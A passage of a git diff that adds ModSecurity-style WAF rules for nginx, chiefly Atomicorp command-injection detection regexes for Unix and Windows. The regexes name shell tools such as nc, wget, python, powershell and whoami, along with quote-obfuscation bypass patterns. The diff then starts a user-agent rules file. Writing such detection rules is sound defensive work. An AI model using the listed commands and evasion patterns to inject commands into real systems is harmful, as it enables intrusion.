\\\\'\"]*c[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*o[\\\\'\"]*n|(?:e[\\\\'\"]*t[\\\\'\"]*c[\\\\'\"]*h|c)[\\\\'\"]*(?:\s|<|>).*|o[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*h|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p)|e[\\\\'\"]*(?:n[\\\\'\"]*(?:v(?:[\\\\'\"]*-[\\\\'\"]*u[\\\\'\"]*p[\\\\'\"]*d[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*e)?|d[\\\\'\"]*(?:i[\\\\'\"]*f|s[\\\\'\"]*w))|x[\\\\'\"]*(?:p[\\\\'\"]*(?:a[\\\\'\"]*n[\\\\'\"]*d|o[\\\\'\"]*r[\\\\'\"]*t|r)|e[\\\\'\"]*c[\\\\'\"]*(?:\s|<|>).*)|c[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*(?:\s|<|>).*|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|s[\\\\'\"]*a[\\\\'\"]*c|v[\\\\'\"]*a[\\\\'\"]*l)|h[\\\\'\"]*(?:t[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|p[\\\\'\"]*a[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*w[\\\\'\"]*d)|o[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*(?:n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e|i[\\\\'\"]*d)|(?:e[\\\\'\"]*a[\\\\'\"]*d|u[\\\\'\"]*p)[\\\\'\"]*(?:\s|<|>).*|i[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*y)|i[\\\\'\"]*(?:p[\\\\'\"]*(?:(?:6[\\\\'\"]*)?t[\\\\'\"]*a[\\\\'\"]*b[\\\\'\"]*l[\\\\'\"]*e[\\\\'\"]*s|c[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*i[\\\\'\"]*g)|r[\\\\'\"]*b(?:[\\\\'\"]*(?:1(?:[\\\\'\"]*[89])?|2[\\\\'\"]*[012]))?|f[\\\\'\"]*c[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*i[\\\\'\"]*g|d[\\\\'\"]*(?:\s|<|>).*)|g[\\\\'\"]*(?:(?:e[\\\\'\"]*t[\\\\'\"]*f[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*l|r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*c|i[\\\\'\"]*t)[\\\\'\"]*(?:\s|<|>).*|z[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*p)|u[\\\\'\"]*n[\\\\'\"]*z[\\\\'\"]*i[\\\\'\"]*p|d[\\\\'\"]*b)|a[\\\\'\"]*(?:(?:l[\\\\'\"]*i[\\\\'\"]*a[\\\\'\"]*s|w[\\\\'\"]*k)[\\\\'\"]*(?:\s|<|>).*|d[\\\\'\"]*d[\\\\'\"]*u[\\\\'\"]*s[\\\\'\"]*e[\\\\'\"]*r|p[\\\\'\"]*t[\\\\'\"]*-[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*t|r[\\\\'\"]*(?:c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|p))|d[\\\\'\"]*(?:h[\\\\'\"]*c[\\\\'\"]*l[\\\\'\"]*i[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*t|(?:i[\\\\'\"]*f[\\\\'\"]*f|u)[\\\\'\"]*(?:\s|<|>).*|(?:m[\\\\'\"]*e[\\\\'\"]*s|p[\\\\'\"]*k)[\\\\'\"]*g|o[\\\\'\"]*(?:a[\\\\'\"]*s|n[\\\\'\"]*e)|a[\\\\'\"]*s[\\\\'\"]*h)|m[\\\\'\"]*(?:(?:k[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*r|o[\\\\'\"]*r[\\\\'\"]*e)[\\\\'\"]*(?:\s|<|>).*|a[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*(?:x[\\\\'\"]*(?:\s|<|>).*|q)|l[\\\\'\"]*o[\\\\'\"]*c[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*e)|j[\\\\'\"]*(?:(?:a[\\\\'\"]*v[\\\\'\"]*a|o[\\\\'\"]*b[\\\\'\"]*s)[\\\\'\"]*(?:\s|<|>).*|e[\\\\'\"]*x[\\\\'\"]*e[\\\\'\"]*c)|k[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*l[\\\\'\"]*(?:a[\\\\'\"]*l[\\\\'\"]*l|(?:\s|<|>).*)|(?:G[\\\\'\"]*E[\\\\'\"]*T[\\\\'\"]*(?:\s|<|>)|\.\s).*|7[\\\\'\"]*z(?:[\\\\'\"]*[ar])?)\b" "id:344363,rev:2,phase:2,deny,status:403,capture,t:none,severity:2,msg:'Atomicorp.com WAF Rules: Remote Command Execution: Unix Command Injection (2-3 chars)',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',ctl:auditLogParts=+E,auditlog,log"
+
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*(?:s[\\\\'\"]*(?:e[\\\\'\"]*(?:t[\\\\'\"]*(?:(?:f[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*l[\\\\'\"]*)?(?:\s|<|>).*|e[\\\\'\"]*n[\\\\'\"]*v|s[\\\\'\"]*i[\\\\'\"]*d)|n[\\\\'\"]*d[\\\\'\"]*m[\\\\'\"]*a[\\\\'\"]*i[\\\\'\"]*l|d[\\\\'\"]*(?:\s|<|>).*)|h[\\\\'\"]*(?:\.[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*r[\\\\'\"]*i[\\\\'\"]*b|u[\\\\'\"]*t[\\\\'\"]*d[\\\\'\"]*o[\\\\'\"]*w[\\\\'\"]*n|(?:\s|<|>).*)|o[\\\\'\"]*(?:(?:u[\\\\'\"]*r[\\\\'\"]*c[\\\\'\"]*e|r[\\\\'\"]*t)[\\\\'\"]*(?:\s|<|>).*|c[\\\\'\"]*a[\\\\'\"]*t)|c[\\\\'\"]*(?:h[\\\\'\"]*e[\\\\'\"]*d|p[\\\\'\"]*(?:\s|<|>).*)|t[\\\\'\"]*r[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*g[\\\\'\"]*s|(?:l[\\\\'\"]*e[\\\\'\"]*e|f[\\\\'\"]*t)[\\\\'\"]*p|y[\\\\'\"]*s[\\\\'\"]*c[\\\\'\"]*t[\\\\'\"]*l|u[\\\\'\"]*(?:(?:\s|<|>).*|d[\\\\'\"]*o)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|s[\\\\'\"]*h|v[\\\\'\"]*n)|p[\\\\'\"]*(?:k[\\\\'\"]*(?:g(?:(?:[\\\\'\"]*_)?[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*o)?|e[\\\\'\"]*x[\\\\'\"]*e[\\\\'\"]*c|i[\\\\'\"]*l[\\\\'\"]*l)|t[\\\\'\"]*a[\\\\'\"]*r(?:[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p))?|a[\\\\'\"]*(?:t[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|s[\\\\'\"]*s[\\\\'\"]*w[\\\\'\"]*d)|r[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*(?:e[\\\\'\"]*n[\\\\'\"]*v|f[\\\\'\"]*(?:\s|<|>).*)|y[\\\\'\"]*t[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*n(?:[\\\\'\"]*(?:3(?:[\\\\'\"]*m)?|2))?|e[\\\\'\"]*r[\\\\'\"]*(?:l(?:[\\\\'\"]*(?:s[\\\\'\"]*h|5))?|m[\\\\'\"]*s)|(?:g[\\\\'\"]*r[\\\\'\"]*e|f[\\\\'\"]*t)[\\\\'\"]*p|(?:u[\\\\'\"]*s[\\\\'\"]*h|o[\\\\'\"]*p)[\\\\'\"]*d|h[\\\\'\"]*p(?:[\\\\'\"]*[57])?|i[\\\\'\"]*n[\\\\'\"]*g|s[\\\\'\"]*(?:\s|<|>).*)|n[\\\\'\"]*(?:c[\\\\'\"]*(?:\.[\\\\'\"]*(?:t[\\\\'\"]*r[\\\\'\"]*a[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*a[\\\\'\"]*l|o[\\\\'\"]*p[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*b[\\\\'\"]*s[\\\\'\"]*d)|(?:\s|<|>).*|a[\\\\'\"]*t)|e[\\\\'\"]*t[\\\\'\"]*(?:k[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*-[\\\\'\"]*f[\\\\'\"]*t[\\\\'\"]*p|(?:s[\\\\'\"]*t|c)[\\\\'\"]*a[\\\\'\"]*t|(?:\s|<|>).*)|s[\\\\'\"]*(?:l[\\\\'\"]*o[\\\\'\"]*o[\\\\'\"]*k[\\\\'\"]*u[\\\\'\"]*p|t[\\\\'\"]*a[\\\\'\"]*t)|(?:a[\\\\'\"]*n[\\\\'\"]*o|i[\\\\'\"]*c[\\\\'\"]*e)[\\\\'\"]*(?:\s|<|>).*|(?:o[\\\\'\"]*h[\\\\'\"]*u|m[\\\\'\"]*a)[\\\\'\"]*p|p[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*g)|r[\\\\'\"]*(?:e[\\\\'\"]*(?:(?:p[\\\\'\"]*(?:l[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e|e[\\\\'\"]*a[\\\\'\"]*t)|n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e)[\\\\'\"]*(?:\s|<|>).*|a[\\\\'\"]*l[\\\\'\"]*p[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*h)|m[\\\\'\"]*(?:(?:d[\\\\'\"]*i[\\\\'\"]*r[\\\\'\"]*)?(?:\s|<|>).*|u[\\\\'\"]*s[\\\\'\"]*e[\\\\'\"]*r)|u[\\\\'\"]*b[\\\\'\"]*y(?:[\\\\'\"]*(?:1(?:[\\\\'\"]*[89])?|2[\\\\'\"]*[012]))?|(?:a[\\\\'\"]*r|c[\\\\'\"]*p|p[\\\\'\"]*m)[\\\\'\"]*(?:\s|<|>).*|n[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*o|o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e|s[\\\\'\"]*y[\\\\'\"]*n[\\\\'\"]*c)|t[\\\\'\"]*(?:c[\\\\'\"]*(?:p[\\\\'\"]*(?:t[\\\\'\"]*r[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e|i[\\\\'\"]*n[\\\\'\"]*g)|s[\\\\'\"]*h)|r[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e(?:[\\\\'\"]*6)?|e[\\\\'\"]*(?:l[\\\\'\"]*n[\\\\'\"]*e[\\\\'\"]*t|e[\\\\'\"]*(?:\s|<|>).*)|i[\\\\'\"]*m[\\\\'\"]*e[\\\\'\"]*(?:o[\\\\'\"]*u[\\\\'\"]*t|(?:\s|<|>).*)|a[\\\\'\"]*(?:i[\\\\'\"]*l(?:[\\\\'\"]*f)?|r[\\\\'\"]*(?:\s|<|>).*)|o[\\\\'\"]*(?:u[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|p))|u[\\\\'\"]*(?:n[\\\\'\"]*(?:l[\\\\'\"]*(?:i[\\\\'\"]*n[\\\\'\"]*k[\\\\'\"]*(?:\s|<|>).*|z[\\\\'\"]*m[\\\\'\"]*a)|c[\\\\'\"]*o[\\\\'\"]*m[\\\\'\"]*p[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|a[\\\\'\"]*m[\\\\'\"]*e|r[\\\\'\"]*a[\\\\'\"]*r|s[\\\\'\"]*e[\\\\'\"]*t|z[\\\\'\"]*i[\\\\'\"]*p|x[\\\\'\"]*z)|s[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*(?:(?:a[\\\\'\"]*d|m[\\\\'\"]*o)[\\\\'\"]*d|d[\\\\'\"]*e[\\\\'\"]*l)|l[\\\\'\"]*i[\\\\'\"]*m[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*(?:\s|<|>).*)|m[\\\\'\"]*(?:y[\\\\'\"]*s[\\\\'\"]*q[\\\\'\"]*l(?:[\\\\'\"]*(?:d[\\\\'\"]*u[\\\\'\"]*m[\\\\'\"]*p(?:[\\\\'\"]*s[\\\\'\"]*l[\\\\'\"]*o[\\\\'\"]*w)?|h[\\\\'\"]*o[\\\\'\"]*t[\\\\'\"]*c[\\\\'\"]*o[\\\\'\"]*p[\\\\'\"]*y|a[\\\\'\"]*d[\\\\'\"]*m[\\\\'\"]*i[\\\\'\"]*n|s[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*w))?|(?:(?:o[\\\\'\"]*u[\\\\'\"]*n|u[\\\\'\"]*t)[\\\\'\"]*t|v)[\\\\'\"]*(?:\s|<|>).*)|x[\\\\'\"]*(?:z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|d[\\\\'\"]*(?:i[\\\\'\"]*f[\\\\'\"]*f|e[\\\\'\"]*c)|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|(?:\s|<|>).*)|a[\\\\'\"]*r[\\\\'\"]*g[\\\\'\"]*s|t[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*m|x[\\\\'\"]*d[\\\\'\"]*(?:\s|<|>).*)|z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|i[\\\\'\"]*p[\\\\'\"]*(?:\s|<|>).*|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|r[\\\\'\"]*u[\\\\'\"]*n|s[\\\\'\"]*h)|o[\\\\'\"]*(?:p[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*l|n[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*r)|w[\\\\'\"]*(?:h[\\\\'\"]*o[\\\\'\"]*(?:a[\\\\'\"]*m[\\\\'\"]*i|(?:\s|<|>).*)|g[\\\\'\"]*e[\\\\'\"]*t|3[\\\\'\"]*m)|v[\\\\'\"]*i[\\\\'\"]*(?:m[\\\\'\"]*(?:\s|<|>).*|g[\\\\'\"]*r|p[\\\\'\"]*w)|y[\\\\'\"]*u[\\\\'\"]*m)\b" "id:344364,rev:2,phase:2,deny,status:403,capture,t:none,severity:2,msg:'Atomicorp.com WAF Rules: Remote Command Execution: Unix Command Injection (2-3 chars)',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',ctl:auditLogParts=+E,auditlog,log"
+
+SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES|!ARGS:/post/|!ARGS:/message/ "@rx (?:^|[^\x5c])\x5c[cdeghijklmpqwxyz123456789]" "id:344365,rev:2,phase:2,deny,status:403,log,auditlog,capture,t:none,t:htmlEntityDecode,t:lowercase,severity:2,msg:'Atomicorp.com WAF Rules: Possible Command Injection using abnormal escape',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',ctl:auditLogParts=+E"
+
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:;|\{|\||\|\||&|&&|\n|\r|`)\s*[\(,@\'\"\s]*(?:[\w'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w '\"/\\\\]*\\\\)?[\"\^]*(?:s[\"\^]*(?:y[\"\^]*s[\"\^]*(?:t[\"\^]*e[\"\^]*m[\"\^]*(?:p[\"\^]*r[\"\^]*o[\"\^]*p[\"\^]*e[\"\^]*r[\"\^]*t[\"\^]*i[\"\^]*e[\"\^]*s[\"\^]*(?:d[\"\^]*a[\"\^]*t[\"\^]*a[\"\^]*e[\"\^]*x[\"\^]*e[\"\^]*c[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n[\"\^]*p[\"\^]*r[\"\^]*e[\"\^]*v[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n|(?:p[\"\^]*e[\"\^]*r[\"\^]*f[\"\^]*o[\"\^]*r[\"\^]*m[\"\^]*a[\"\^]*n[\"\^]*c|h[\"\^]*a[\"\^]*r[\"\^]*d[\"\^]*w[\"\^]*a[\"\^]*r)[\"\^]*e|a[\"\^]*d[\"\^]*v[\"\^]*a[\"\^]*n[\"\^]*c[\"\^]*e[\"\^]*d)|i[\"\^]*n[\"\^]*f[\"\^]*o)|k[\"\^]*e[\"\^]*y|d[\"\^]*m)|h[\"\^]*(?:o[\"\^]*(?:w[\"\^]*(?:g[\"\^]*r[\"\^]*p|m[\"\^]*b[\"\^]*r)[\"\^]*s|r[\"\^]*t[\"\^]*c[\"\^]*u[\"\^]*t)|e[\"\^]*l[\"\^]*l[\"\^]*r[\"\^]*u[\"\^]*n[\"\^]*a[\"\^]*s|u[\"\^]*t[\"\^]*d[\"\^]*o[\"\^]*w[\"\^]*n|r[\"\^]*p[\"\^]*u[\"\^]*b[\"\^]*w|a[\"\^]*r[\"\^]*e|i[\"\^]*f[\"\^]*t)|e[\"\^]*(?:t[\"\^]*(?:(?:x[\"\^]*)?(?:[\s,;]|\.|/|<|>).*|l[\"\^]*o[\"\^]*c[\"\^]*a[\"\^]*l)|c[\"\^]*p[\"\^]*o[\"\^]*l|l[\"\^]*e[\"\^]*c[\"\^]*t)|c[\"\^]*(?:h[\"\^]*t[\"\^]*a[\"\^]*s[\"\^]*k[\"\^]*s|l[\"\^]*i[\"\^]*s[\"\^]*t)|u[\"\^]*b[\"\^]*(?:i[\"\^]*n[\"\^]*a[\"\^]*c[\"\^]*l|s[\"\^]*t)|t[\"\^]*a[\"\^]*r[\"\^]*t[\"\^]*(?:[\s,;]|\.|/|<|>).*|i[\"\^]*g[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*i[\"\^]*f|l[\"\^]*(?:e[\"\^]*e[\"\^]*p|m[\"\^]*g[\"\^]*r)|o[\"\^]*r[\"\^]*t|f[\"\^]*c|v[\"\^]*n)|p[\"\^]*(?:s[\"\^]*(?:s[\"\^]*(?:h[\"\^]*u[\"\^]*t[\"\^]*d[\"\^]*o[\"\^]*w[\"\^]*n|e[\"\^]*r[\"\^]*v[\"\^]*i[\"\^]*c[\"\^]*e|u[\"\^]*s[\"\^]*p[\"\^]*e[\"\^]*n[\"\^]*d)|l[\"\^]*(?:o[\"\^]*g[\"\^]*(?:g[\"\^]*e[\"\^]*d[\"\^]*o[\"\^]*n|l[\"\^]*i[\"\^]*s[\"\^]*t)|i[\"\^]*s[\"\^]*t)|p[\"\^]*(?:a[\"\^]*s[\"\^]*s[\"\^]*w[\"\^]*d|i[\"\^]*n[\"\^]*g)|g[\"\^]*e[\"\^]*t[\"\^]*s[\"\^]*i[\"\^]*d|e[\"\^]*x[\"\^]*e[\"\^]*c|f[\"\^]*i[\"\^]*l[\"\^]*e|i[\"\^]*n[\"\^]*f[\"\^]*o|k[\"\^]*i[\"\^]*l[\"\^]*l)|o[\"\^]*(?:w[\"\^]*e[\"\^]*r[\"\^]*(?:s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l(?:[\"\^]*_[\"\^]*i[\"\^]*s[\"\^]*e)?|c[\"\^]*f[\"\^]*g)|r[\"\^]*t[\"\^]*q[\"\^]*r[\"\^]*y|p[\"\^]*d)|r[\"\^]*(?:i[\"\^]*n[\"\^]*t[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|b[\"\^]*r[\"\^]*m)|n[\"\^]*(?:c[\"\^]*n[\"\^]*f[\"\^]*g|m[\"\^]*n[\"\^]*g[\"\^]*r)|o[\"\^]*m[\"\^]*p[\"\^]*t)|a[\"\^]*t[\"\^]*h[\"\^]*(?:p[\"\^]*i[\"\^]*n[\"\^]*g|(?:[\s,;]|\.|/|<|>).*)|e[\"\^]*r[\"\^]*(?:l(?:[\"\^]*(?:s[\"\^]*h|5))?|f[\"\^]*m[\"\^]*o[\"\^]*n)|y[\"\^]*t[\"\^]*h[\"\^]*o[\"\^]*n(?:[\"\^]*(?:3(?:[\"\^]*m)?|2))?|k[\"\^]*g[\"\^]*m[\"\^]*g[\"\^]*r|h[\"\^]*p(?:[\"\^]*[57])?|u[\"\^]*s[\"\^]*h[\"\^]*d|i[\"\^]*n[\"\^]*g)|r[\"\^]*(?:e[\"\^]*(?:(?:p[\"\^]*l[\"\^]*a[\"\^]*c[\"\^]*e|n(?:[\"\^]*a[\"\^]*m[\"\^]*e)?|s[\"\^]*e[\"\^]*t)[\"\^]*(?:[\s,;]|\.|/|<|>).*|g[\"\^]*(?:s[\"\^]*v[\"\^]*r[\"\^]*3[\"\^]*2|e[\"\^]*d[\"\^]*i[\"\^]*t|(?:[\s,;]|\.|/|<|>).*|i[\"\^]*n[\"\^]*i)|c[\"\^]*(?:d[\"\^]*i[\"\^]*s[\"\^]*c|o[\"\^]*v[\"\^]*e[\"\^]*r)|k[\"\^]*e[\"\^]*y[\"\^]*w[\"\^]*i[\"\^]*z)|u[\"\^]*(?:n[\"\^]*(?:d[\"\^]*l[\"\^]*l[\"\^]*3[\"\^]*2|a[\"\^]*s)|b[\"\^]*y[\"\^]*(?:1(?:[\"\^]*[89])?|2[\"\^]*[012]))|a[\"\^]*(?:s[\"\^]*(?:p[\"\^]*h[\"\^]*o[\"\^]*n[\"\^]*e|d[\"\^]*i[\"\^]*a[\"\^]*l)|r[\"\^]*(?:[\s,;]|\.|/|<|>).*)|m[\"\^]*(?:(?:d[\"\^]*i[\"\^]*r[\"\^]*)?(?:[\s,;]|\.|/|<|>).*|t[\"\^]*s[\"\^]*h[\"\^]*a[\"\^]*r[\"\^]*e)|o[\"\^]*(?:u[\"\^]*t[\"\^]*e[\"\^]*(?:[\s,;]|\.|/|<|>).*|b[\"\^]*o[\"\^]*c[\"\^]*o[\"\^]*p[\"\^]*y)|s[\"\^]*(?:t[\"\^]*r[\"\^]*u[\"\^]*i|y[\"\^]*n[\"\^]*c)|d[\"\^]*(?:[\s,;]|\.|/|<|>).*)|t[\"\^]*(?:a[\"\^]*(?:s[\"\^]*k[\"\^]*(?:k[\"\^]*i[\"\^]*l[\"\^]*l|l[\"\^]*i[\"\^]*s[\"\^]*t|s[\"\^]*c[\"\^]*h[\"\^]*d|m[\"\^]*g[\"\^]*r)|k[\"\^]*e[\"\^]*o[\"\^]*w[\"\^]*n)|(?:i[\"\^]*m[\"\^]*e[\"\^]*o[\"\^]*u|p[\"\^]*m[\"\^]*i[\"\^]*n[\"\^]*i|e[\"\^]*l[\"\^]*n[\"\^]*e|l[\"\^]*i[\"\^]*s)[\"\^]*t|s[\"\^]*(?:d[\"\^]*i[\"\^]*s[\"\^]*c[\"\^]*o|s[\"\^]*h[\"\^]*u[\"\^]*t[\"\^]*d)[\"\^]*n|y[\"\^]*p[\"\^]*e[\"\^]*(?:p[\"\^]*e[\"\^]*r[\"\^]*f|(?:[\s,;]|\.|/|<|>).*)|r[\"\^]*(?:a[\"\^]*c[\"\^]*e[\"\^]*r[\"\^]*t|e[\"\^]*e))|w[\"\^]*(?:i[\"\^]*n[\"\^]*(?:d[\"\^]*i[\"\^]*f[\"\^]*f|m[\"\^]*s[\"\^]*d[\"\^]*p|v[\"\^]*a[\"\^]*r|r[\"\^]*[ms])|u[\"\^]*(?:a[\"\^]*(?:u[\"\^]*c[\"\^]*l[\"\^]*t|p[\"\^]*p)|s[\"\^]*a)|s[\"\^]*c[\"\^]*(?:r[\"\^]*i[\"\^]*p[\"\^]*t|u[\"\^]*i)|e[\"\^]*v[\"\^]*t[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|m[\"\^]*i[\"\^]*(?:m[\"\^]*g[\"\^]*m[\"\^]*t|c)|a[\"\^]*i[\"\^]*t[\"\^]*f[\"\^]*o[\"\^]*r|h[\"\^]*o[\"\^]*a[\"\^]*m[\"\^]*i|g[\"\^]*e[\"\^]*t)|u[\"\^]*(?:s[\"\^]*(?:e[\"\^]*r[\"\^]*a[\"\^]*c[\"\^]*c[\"\^]*o[\"\^]*u[\"\^]*n[\"\^]*t[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*t[\"\^]*r[\"\^]*o[\"\^]*l[\"\^]*s[\"\^]*e[\"\^]*t[\"\^]*t[\"\^]*i[\"\^]*n[\"\^]*g[\"\^]*s|r[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*t)|n[\"\^]*(?:r[\"\^]*a[\"\^]*r|z[\"\^]*i[\"\^]*p))|q[\"\^]*(?:u[\"\^]*e[\"\^]*r[\"\^]*y[\"\^]*(?:[\s,;]|\.|/|<|>).*|p[\"\^]*r[\"\^]*o[\"\^]*c[\"\^]*e[\"\^]*s[\"\^]*s|w[\"\^]*i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a|g[\"\^]*r[\"\^]*e[\"\^]*p)|o[\"\^]*(?:d[\"\^]*b[\"\^]*c[\"\^]*(?:a[\"\^]*d[\"\^]*3[\"\^]*2|c[\"\^]*o[\"\^]*n[\"\^]*f)|p[\"\^]*e[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s)|v[\"\^]*(?:o[\"\^]*l[\"\^]*(?:[\s,;]|\.|/|<|>).*|e[\"\^]*r[\"\^]*i[\"\^]*f[\"\^]*y)|x[\"\^]*c[\"\^]*(?:a[\"\^]*c[\"\^]*l[\"\^]*s|o[\"\^]*p[\"\^]*y)|z[\"\^]*i[\"\^]*p[\"\^]*(?:[\s,;]|\.|/|<|>).*)(?:\.[\"\^]*\w+)?\b" "id:344366,rev:1,phase:2,deny,status:403,capture,t:none,msg:'Atomicorp.com WAF Rules: Remote Command Execution: Windows Command Injection',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'attack-rce',ctl:auditLogParts=+E,severity:'CRITICAL'"
+
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ([*?`\\'][^/\n]+/|\$[({\[#a-zA-Z0-9]|/[^/]+?[*?`\\'])" "id:344370,phase:2,deny,status:403,capture,t:none,t:lowercase,t:urlDecodeUni,msg:'RCE Bypass Technique',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'RCE',severity:'CRITICAL',rev:2,chain"
+    SecRule MATCHED_VAR "@rx /" "t:none,t:urlDecodeUni,chain"
+        SecRule MATCHED_VAR "@rx \s" "t:none,t:urlDecodeUni"
+
+
+
+SecMarker END_DETECT_CMD_INJECT_ADV
+
+
+
diff --git a/nginx-waf/20_asl_useragents.conf b/nginx-waf/20_asl_useragents.conf
new file mode 100644
index 0000000..1233d95
--- /dev/null
+++ b/nginx-waf/20_asl_useragents.conf
@@ -0,0 +1,442 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+SecRule REQUEST_FILENAME "/cron/index\.php" "phase:2,id:95076,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330017"
+
+SecRule REQUEST_FILENAME "/ssp_director/index\.php" "phase:2,id:95077,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330069"
+
+SecRule REQUEST_FILENAME "/ssp_director" "phase:2,id:95078,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330069"
+
+SecRule REQUEST_FILENAME "/silentpost\.php" "phase:2,id:95079,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330030"
+
